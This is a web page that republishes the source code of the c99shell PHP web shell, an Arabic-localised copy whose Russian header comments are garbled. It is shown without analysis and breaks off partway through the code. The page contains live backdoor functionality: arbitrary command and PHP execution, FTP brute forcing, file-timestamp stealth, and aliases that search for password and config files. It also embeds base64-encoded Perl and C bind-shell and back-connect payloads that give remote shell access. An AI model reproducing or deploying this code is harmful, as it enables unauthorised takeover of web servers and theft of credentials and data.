Home About us Agents Latest Property News FAQs Contact Support

Search

shell

ssa

<?php
/*
******************************************************************************************************
*
*                                        c99shell.php *                                                        Freeware license.
*                                                              *  c99shell - ôàéë-ىهيهنوهً ÷هًهç www-لًîَçهً, "çàٍî÷هيûé" نëے âçëîىà.
*  آû ىîوهٍه لهٌïëàٍيî ٌêà÷àٍü ïîٌëهني‏‏ âهًٌè‏ يà نîىàّيهé ًٌٍàيè÷êه ïًîنَêٍà:
   
*
*  WEB: www.google.com
*  ICQ UIN #: 656555
*
*  خٌîلهييîٌٍè:
*  + َïًàâëهيèه ëîêàëüيûىè è َنàëهييûىè (ftp, samba *) ôàéëàىè/ïàïêàىè, ٌîًٍèًîâêà
*    çàêà÷èâàيèه ٌêà÷èâàيèه ôàéëîâ è ïàïîê
*    (ïًهنâîًèٍهëüيî َïàêîâûâàهٌٍے/ًàٌïàêîâûâàهٌٍے ÷هًهç tar *)
*    ïًîنâèيٍَûé ïîèٌê (âîçىîوهي âيًٍَè ôàéëîâ)
*    modify-time è access-time َ ôàéëîâ يه ىهيے‏ٌٍے ïًè ًهنàêٍèًîâàيèè (âûêë./âêë. ïàًàىهًٍîى $filestealth)
*  + ïًîنâèيٍَûé SQL-ىهيهنوهً يه ٌٍََïà‏ùèé phpmyadmin,
     ïًîٌىîًٍ/ٌîçنàيèه/ًهنàêٍèًîâàيèه ءؤ/ٍàلëèِ, ïًîٌىîًٍ ôàéëîâ ÷هًهç لًهّü â mysql
*  + َïًàâëهيèه ïًîِهٌٌàىè unix-ىàّèيû.
*  + َنîليîه (èيîمنà مًàôè÷هٌêîه) âûïîëيهيèه shell-êîىàين (ىيîمî àëèàٌîâ, ىîويî ًهنàêٍèًîâàٍü)
*  + âûïîëيهيèه ïًîèçâîëüيîمî PHP-êîنà
*  + êîنèًîâùèê نàييûُ ÷هًهç md5, unix-md5, sha1, crc32, base64
*  + لûًٌٍûé ëîêàëüيûé àيàëèç لهçîïàٌيîٌٍè خر
*  + لûًٌٍîه ftp-ٌêàيèًîâàيèه يà ٌâےçêè login;login èç /etc/passwd (îلû÷يî نàهٍ نîٌٍَï ê 1/100 àêêàَيٍîâ)
*    ïîًٌٍàيè÷يûé âûâîن, ٌîًٍèًîâêà, مًَïïîâûه îïهًàِèè يàن ءؤ/ٍàلëèِàىè, َïًàâëهيèه ïًîِهٌٌàىè SQL)
*  + ٌêًèïٍ "ë‏لèٍ" include: àâٍîىàٍè÷هٌêè èùهٍ ïهًهىهييûه ٌ نهٌêًèïٍîًàىè è âٌٍàâëےهٍ èُ â ٌٌûëêè (îïِèàëüيî)
     ٍàêوه ىîويî èçىهيèٍü $surl (لàçîâàے ٌٌûëêà) êàê ÷هًهç êîيôèمًَàِè‏ (ïًèيَنèٍهëüيî) ٍàê è ÷هًهç cookie "c99sh_surl",
     èنهٍ àâٍî-çàïèٌü çيà÷هيèے $set_surl â cookie "set_surl"
*  + âîçىîويîٌٍü "çàلèينèٍü" /bin/bash يà îïًهنهëهييûé ïîًٍ ٌ ïًîèçâîëüيûى ïàًîëهى,
*    èëè ٌنهëàٍü back connect (ïًîèçâîنèٌٍے ٍهٌٍèًîâàيèه ٌîهنهيهيèے, è âûâîنےٌٍے ïàًàىهًٍû نëے çàïٌَêà NetCat).
*  + âîçىîويîٌٍü لûًٌٍîمî ٌàىî-َنàëهيèے ٌêًèïٍà
*  + àâٍîىàٍèçèًîâàيàے îٍïًàâêà ٌîîلùهيèé î يهنîًàلîٍêàُ è ïîوهëàيèé àâٍîًَ (÷هًهç mail())

*  * - ٌَïهُ ïîëيîٌٍü‏ çàâèٌèٍ îٍ êîيôèمًَàِèè PHP
*
*        آ îلùهى يَويî َâèنهٍü âٌ¸ ‎ٍî!
*
*   خوèنàهىûه èçىهيهيèے:
*  ~ ذàçâèٍèه sql-ىهيهنوهًà
*  ~ ؤîلàâëهيèه يهنîٌٍà‏ùèُ ًàٌّèًهيèé ôàéëîâ
*
*  ~-~ دèّèٍه îلî âٌهُ يàéنهيûُ يهنîًàلîٍêàُ, وهëàهىûُ èçىهيهيèےُ è نîًàلîٍêàُ (نàوه î ٌàىûُ يهçيà÷èٍهëüيûُ!)
       â ICQ UIN #656555 ëèلî ÷هًهç ًàçنهë "feedback", لَنٍَ ًàٌٌىîًٍهيû âٌه ïًهنëîوهيèے è ïîوهëàيèے.
*
*  Last modify: 3.07.2005
*
*  © Golden-z3ro. ©oded by Golden-z3ro
*
******************************************************************************************************
*/
//Starting calls
if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
error_reporting(5);
@ignore_user_abort(true);
@set_magic_quotes_runtime(0);
$win = strtolower(substr(PHP_OS, 0, 3)) == "win";
define("starttime",getmicrotime());
if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}

$shver = ""; //Current version
//CONFIGURATION AND SETTINGS
if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
}

$surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL.

if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
if (empty($surl))
{
 $surl = "?".$includestr; //Self url
}
$surl = htmlspecialchars($surl);

$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.

//Authentication
$login = ""; //login
//DON'T FORGOT ABOUT PASSWORD!!!
$pass = ""; //password
$md5_pass = ""; //md5-cryped pass. if null, md5($pass)

if (stristr($_SERVER["GATEWAY_INTERFACE"],"cgi")) {$login = "";} // If CGI then turn off auth.

$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
$login_txt = "Restricted area"; //http-auth message.
$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied";

$gzipencode = true; //Encode with gzip?

$autoupdate = false; //Automatic updating?

$updatenow = false; //If true, update now (this variable will be false)

$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server

$filestealth = true; //if true, don't change modify&access-time

$donated_html = "<center><b>;
تم تعريب الشل من طرف منظمة الحرباء | comix <span
class=SpellE>;</b></center>";
                /* If you publish free shell and you wish
                add link to your site or any other information,
                put here your html. */
$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.

$curdir = "./"; //start folder
//$curdir = getenv("DOCUMENT_ROOT");
$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)

$log_email = "user@host.tld"; //Default e-mail for sending logs

$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
$sort_save = true; //If true then save sorting-type.

// Registered file-types.
//  array(
//   "{action1}"=>array("ext1","ext2","ext3",...),
//   "{action2}"=>array("ext4","ext5","ext6",...),
//   ...
//  )
$ftypes  = array(
 "html"=>array("html","htm","shtml"),
 "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
 "exe"=>array("sh","install","bat","cmd"),
 "ini"=>array("ini","inf"),
 "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
 "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
 "sdb"=>array("sdb"),
 "phpsess"=>array("sess"),
 "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
);

// Registered executable file-types.
//  array(
//   string "command{i}"=>array("ext1","ext2","ext3",...),
//   ...
//  )
//   {command}: %f% = filename
$exeftypes  = array(
 getenv("PHPRC")." %f%"=>array("php","php3","php4"),
);

/* Highlighted files.
  array(
   i=>array({regexp},{type},{opentag},{closetag},{break})
   ...
  )
  string {regexp} - regular exp.
  int {type}:
        0 - files and folders (as default),
        1 - files only, 2 - folders only
  string {opentag} - open html-tag, e.g. "<b>" (default)
  string {closetag} - close html-tag, e.g. "</b>" (default)
  bool {break} - if true and found match then break
*/
$regxp_highlight  = array(
  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
  array("config.php",1) // example
);

$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
                                                                         // array (i=>{letter} ...); string {letter} - letter of a drive
//$safemode_diskettes = range("a","z");
$hexdump_lines = 8;        // lines in hex preview file
$hexdump_rows = 24;        // 16, 24 or 32 bytes in one line

$nixpwdperpage = 100; // Get first N lines from /etc/passwd

$bindport_pass = "c99";          // default password for binding
$bindport_port = "31373"; // default port for binding
$bc_port = "31373"; // default port for back-connect

// Command-aliases
if (!$win)
{
 $cmdaliases = array(
  array("-----------------------------------------------------------", "ls -la"),
  array("العثور على جميع الملفات SUID", "find / -type f -perm -04000 -ls"),
  array("العثور على ملفات SUID في الدليل الحالي", "find . -type f -perm -04000 -ls"),
  array("العثور على جميع الملفات SGID", "find / -type f -perm -02000 -ls"),
  array("العثور على ملفات SGID في الدليل الحالي", "find . -type f -perm -02000 -ls"),
  array("العثور على ملفات config.inc.php", "find / -type f -name config.inc.php"),
  array("find config* files", "find / -type f -name \"config*\""),
  array("find config* files in current dir", "find . -type f -name \"config*\""),
  array("العثور على كل المجلدات والملفات للكتابة", "find / -perm -2 -ls"),
  array("العثور على جميع المجلدات والملفات للكتابة في دير الحالي", "find . -perm -2 -ls"),
  array("العثور على جميع الملفات service.pwd", "find / -type f -name service.pwd"),
  array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
  array("find all .htpasswd files", "find / -type f -name .htpasswd"),
  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
  array("find all .bash_history files", "find / -type f -name .bash_history"),
  array("العثور على جميع الملفات .bash_history", "find . -type f -name .bash_history"),
  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
  array("list file attributes on a Linux second extended file system", "lsattr -va"),
  array("show opened ports", "netstat -an | grep -i listen")
 );
}
else
{
 $cmdaliases = array(
  array("-----------------------------------------------------------", "dir"),
  array("إظهار المنافذ المفتوحة", "netstat -an")
 );
}

$sess_cookie = "c99shvars"; // Cookie-variable name

$usefsbuff = true; //Buffer-function
$copy_unset = false; //Remove copied files from buffer after pasting

//Quick launch
$quicklaunch = array(
 array("<img src=\"".$surl."act=img&img=home\" alt=\"الصفحة الرئيسة\" height=\"20\" width=\"20\" border=\"0\">",$surl),
 array("<img src=\"".$surl."act=img&img=back\" alt=\"رجوع\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
 array("<img src=\"".$surl."act=img&img=forward\" alt=\"تقدم\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
 array("<img src=\"".$surl."act=img&img=up\" alt=\"أعلى\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
 array("<img src=\"".$surl."act=img&img=refresh\" alt=\"تحديث\" height=\"20\" width=\"17\" border=\"0\">",""),
 array("<img src=\"".$surl."act=img&img=search\" alt=\"بحث\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
 array("<img src=\"".$surl."act=img&img=buffer\" alt=\"الحاجز\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
 array("<b>المشفر</b>",$surl."act=encoder&d=%d"),
 array("<b>إتصال عكسي</b>",$surl."act=bind&d=%d"),
 array("<b>Proc.</b>",$surl."act=processes&d=%d"),
 array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),
 array("<b>الحماية</b>",$surl."act=security&d=%d"),
 array("<b>SQL</b>",$surl."act=sql&d=%d"),
 array("<b>PHP-code</b>",$surl."act=eval&d=%d"),
 array("<b>تحديث النسخة</b>",$surl."act=update&d=%d"),
 array("<b>ملاحضات</b>",$surl."act=feedback&d=%d"),
 array("<b>حدف الشل</b>",$surl."act=selfremove"),
 array("<b>خروج</b>","#\" onclick=\"if (confirm('هل أنت متأكد من تسجيل الخروج')) window.close()")
);

//Highlight-code colors
$highlight_background = "#c0c0c0";
$highlight_bg = "#FFFFFF";
$highlight_comment = "#6A6A6A";
$highlight_default = "#0000BB";
$highlight_html = "#1300FF";
$highlight_keyword = "#007700";
$highlight_string = "#000000";

@$f = $_REQUEST["f"];
@extract($_REQUEST["c99shcook"]);

//END CONFIGURATION


//                                 \/        Next code isn't for editing        \/
@set_time_limit($timelimit);
$tmp = array();
foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
$s = "!^(".implode("|",$tmp).")$!i";
if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
if (!empty($login))
{
 if(empty($md5_pass)) {$md5_pass = md5($pass);}
 if (($_SERVER["PHP_AUTH_USER"] != $login ) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
 {
  if ($login_txt === "") {$login_txt = "";}
  elseif (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
  header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\"");
  header("HTTP/1.0 401 Unauthorized");
  exit($accessdeniedmess);
 }
}
if ($act != "img")
{
$lastdir = realpath(".");
chdir($curdir);
if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;}
$sess_data = unserialize($_COOKIE["$sess_cookie"]);
if (!is_array($sess_data)) {$sess_data = array();}
if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}

if (!function_exists("c99_buff_prepare"))
{
function c99_buff_prepare()
{
 global $sess_data;
 global $act;
 foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
 foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
 $sess_data["copy"] = array_unique($sess_data["copy"]);
 $sess_data["cut"] = array_unique($sess_data["cut"]);
 sort($sess_data["copy"]);
 sort($sess_data["cut"]);
 if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
 else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
}
}
c99_buff_prepare();
if (!function_exists("c99_sess_put"))
{
function c99_sess_put($data)
{
 global $sess_cookie;
 global $sess_data;
 c99_buff_prepare();
 $sess_data = $data;
 $data = serialize($data);
 setcookie($sess_cookie,$data);
}
}
foreach (array("sort","sql_sort") as $v)
{
 if (!empty($_GET[$v])) {$$v = $_GET[$v];}
 if (!empty($_POST[$v])) {$$v = $_POST[$v];}
}
if ($sort_save)
{
 if (!empty($sort)) {setcookie("sort",$sort);}
 if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
}
if (!function_exists("str2mini"))
{
function str2mini($content,$len)
{
 if (strlen($content) > $len)
 {
  $len = ceil($len/2) - 2;
  return substr($content, 0,$len)."...".substr($content,-$len);
 }
 else {return $content;}
}
}
if (!function_exists("view_size"))
{
function view_size($size)
{
 if (!is_numeric($size)) {return false;}
 else
 {
  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
  else {$size = $size . " B";}
  return $size;
 }
}
}
if (!function_exists("fs_copy_dir"))
{
function fs_copy_dir($d,$t)
{
 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
 $h = opendir($d);
 while (($o = readdir($h)) !== false)
 {
  if (($o != ".") and ($o != ".."))
  {
   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
   if (!$ret) {return $ret;}
  }
 }
 closedir($h);
 return true;
}
}
if (!function_exists("fs_copy_obj"))
{
function fs_copy_obj($d,$t)
{
 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
 if (!is_dir(dirname($t))) {mkdir(dirname($t));}
 if (is_dir($d))
 {
  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  return fs_copy_dir($d,$t);
 }
 elseif (is_file($d)) {return copy($d,$t);}
 else {return false;}
}
}
if (!function_exists("fs_move_dir"))
{
function fs_move_dir($d,$t)
{
 $h = opendir($d);
 if (!is_dir($t)) {mkdir($t);}
 while (($o = readdir($h)) !== false)
 {
  if (($o != ".") and ($o != ".."))
  {
   $ret = true;
   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = false;}}
   if (!$ret) {return $ret;}
  }
 }
 closedir($h);
 return true;
}
}
if (!function_exists("fs_move_obj"))
{
function fs_move_obj($d,$t)
{
 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
 if (is_dir($d))
 {
  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  return fs_move_dir($d,$t);
 }
 elseif (is_file($d))
 {
  if(copy($d,$t)) {return unlink($d);}
  else {unlink($t); return false;}
 }
 else {return false;}
}
}
if (!function_exists("fs_rmdir"))
{
function fs_rmdir($d)
{
 $h = opendir($d);
 while (($o = readdir($h)) !== false)
 {
  if (($o != ".") and ($o != ".."))
  {
   if (!is_dir($d.$o)) {unlink($d.$o);}
   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
  }
 }
 closedir($h);
 rmdir($d);
 return !is_dir($d);
}
}
if (!function_exists("fs_rmobj"))
{
function fs_rmobj($o)
{
 $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
 if (is_dir($o))
 {
  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
  return fs_rmdir($o);
 }
 elseif (is_file($o)) {return unlink($o);}
 else {return false;}
}
}
if (!function_exists("myshellexec"))
{
function myshellexec($cmd)
{
 $result = "";
 if (!empty($cmd))
 {
  if (is_callable("exec")) {exec($cmd,$result); $result = join("\n",$result);}
  elseif (($result = `$cmd`) !== false) {}
  elseif (is_callable("system")) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_callable("passthru")) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_resource($fp = popen($cmd,"r")))
  {
   $result = "";
   while(!feof($fp)) {$result .= fread($fp,1024);}
   pclose($fp);
  }
 }
 return $result;
}
}
if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
if (!function_exists("view_perms"))
{
function view_perms($mode)
{
 if (($mode & 0xC000) === 0xC000) {$type = "s";}
 elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
 elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
 elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
 elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
 elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
 elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
 else {$type = "?";}

 $owner["read"] = ($mode & 00400)?"r":"-";
 $owner["write"] = ($mode & 00200)?"w":"-";
 $owner["execute"] = ($mode & 00100)?"x":"-";
 $group["read"] = ($mode & 00040)?"r":"-";
 $group["write"] = ($mode & 00020)?"w":"-";
 $group["execute"] = ($mode & 00010)?"x":"-";
 $world["read"] = ($mode & 00004)?"r":"-";
 $world["write"] = ($mode & 00002)? "w":"-";
 $world["execute"] = ($mode & 00001)?"x":"-";

 if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
 if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
 if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}

 return $type.$owner["read"].$owner["write"].$owner["execute"].
        $group["read"].$group["write"].$group["execute"].
        $world["read"].$world["write"].$world["execute"];
}
}
if (!function_exists("parse_perms"))
{
function parse_perms($mode)
{
 if (($mode & 0xC000) === 0xC000) {$t = "s";}
 elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
 elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
 elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
 elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
 elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
 elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
 else {$t = "?";}
 $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
 $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
 $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
 return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
}
}
if (!function_exists("parsesort"))
{
function parsesort($sort)
{
 $one = intval($sort);
 $second = substr($sort,-1);
 if ($second != "d") {$second = "a";}
 return array($one,$second);
}
}
if (!function_exists("view_perms_color"))
{
function view_perms_color($o)
{
 if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
 elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
 else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
}
}
if (!function_exists("c99getsource"))
{
function c99getsource($fn)
{
 if ($fn == "c99sh_bindport.pl") {return base64_decode(
"IyEvdXNyL2Jpbi9wZXJsDQppZiAoQEFSR1YgPCAxKSB7ZXhpdCgxKTt9DQokcG9ydCA9ICRBUkdW".
"WzBdOw0KZXhpdCBpZiBmb3JrOw0KJDAgPSAidXBkYXRlZGIiIC4gIiAiIHgxMDA7DQokU0lHe0NI".
"TER9ID0gJ0lHTk9SRSc7DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsIFBGX0lORVQsIFNPQ0tfU1RS".
"RUFNLCAwKTsNCnNldHNvY2tvcHQoUywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAxKTsNCmJp".
"bmQoUywgc29ja2FkZHJfaW4oJHBvcnQsIElOQUREUl9BTlkpKTsNCmxpc3RlbihTLCA1MCk7DQph".
"Y2NlcHQoWCxTKTsNCm9wZW4gU1RESU4sICI8JlgiOw0Kb3BlbiBTVERPVVQsICI+JlgiOw0Kb3Bl".
"biBTVERFUlIsICI+JlgiOw0KZXhlYygiZWNobyBcIldlbGNvbWUgdG8gYzk5c2hlbGwhXHJcblxy".
"XG5cIiIpOw0Kd2hpbGUoMSkNCnsNCiBhY2NlcHQoWCwgUyk7DQogdW5sZXNzKGZvcmspDQogew0K".
"ICBvcGVuIFNURElOLCAiPCZYIjsNCiAgb3BlbiBTVERPVVQsICI+JlgiOw0KICBjbG9zZSBYOw0K".
"ICBleGVjKCIvYmluL3NoIik7DQogfQ0KIGNsb3NlIFg7DQp9");}
 elseif ($fn == "c99sh_bindport.c") {return base64_decode(
"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5".
"cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4N".
"CiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50IGFyZ2M7DQpjaGFy".
"ICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1".
"Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5f".
"ZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9pKGFyZ3ZbMV0p".
"KTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tm".
"ZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigi".
"c29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikmcmVtb3Rl".
"LCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1h".
"Y2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsN".
"CiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk7DQogICBy".
"ZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1Zikp".
"DQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byBjOTlzaGVsbCAmJiAvYmluL2Jhc2ggLWkiKTsN".
"CiAgIGVsc2UNCiAgIGZwcmludGYoc3RkZXJyLCJTb3JyeSIpOw0KICAgY2xvc2UobmV3ZmQpOw0K".
"ICB9DQogfQ0KfQ0KaW50IGNocGFzcyhjaGFyICpiYXNlLCBjaGFyICplbnRlcmVkKSB7DQppbnQg".
"aTsNCmZvcihpPTA7aTxzdHJsZW4oZW50ZXJlZCk7aSsrKSANCnsNCmlmKGVudGVyZWRbaV0gPT0g".
"J1xuJykNCmVudGVyZWRbaV0gPSAnXDAnOyANCmlmKGVudGVyZWRbaV0gPT0gJ1xyJykNCmVudGVy".
"ZWRbaV0gPSAnXDAnOw0KfQ0KaWYgKCFzdHJjbXAoYmFzZSxlbnRlcmVkKSkNCnJldHVybiAwOw0K".
"fQ==");}
 elseif ($fn == "c99sh_backconn.pl") {return base64_decode(
"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ".
"HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ".
"DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ".
"HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L".
"CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd".
"GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka".
"WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO".
"iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR".
"VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK".
"FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==");}
 elseif ($fn == "c99sh_backconn.c") {return base64_decode(
